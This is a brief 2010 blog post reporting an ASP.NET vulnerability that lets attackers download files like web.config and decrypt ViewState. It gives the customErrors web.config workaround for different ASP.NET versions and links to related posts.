Security flaw in ASP.NET Applications

Scott Guthrie on his asp.net weblog has written about serious security flaw in asp.net that was discovered yesterday, 17 September 2010.

Today, Microsoft has released a Microsoft Security Advisory that helps in detecting the security flaw.

What does this voulnerability enable?

Scott Guthrie on his blog says: "An attacker using this vulnerability can request and download files within an ASP.NET Application like the web.config file (which often contains sensitive data). At attacker exploiting this vulnerability can also decrypt data sent to the client in an encrypted state (like ViewState data within a page)."
(Reference: Scott Guthrie's Blog)

The workaround is pretty simple. You need to modify your Web.config file. Enable the customErrors and write the following settings:

For ASP:NET 1.0 to ASP:NET 3.0 - <customErrors mode="On" defaultRedirect="~/error.html" />

For ASP.NET 3.5 and ASP.NET 4.0 - <customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/error.html" />

From the comments I've seen on the Scott's blog, this security flaw impacts Sharepoint too.

List of other blogs 'talking' about this security flaw:

- http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx

- http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx

- http://stevesmithblog.com/blog/asp-net-custom-errors-security-flaw/

If you have anything to ask, please do not hesitate to do so.

Kind Regards,
Hajan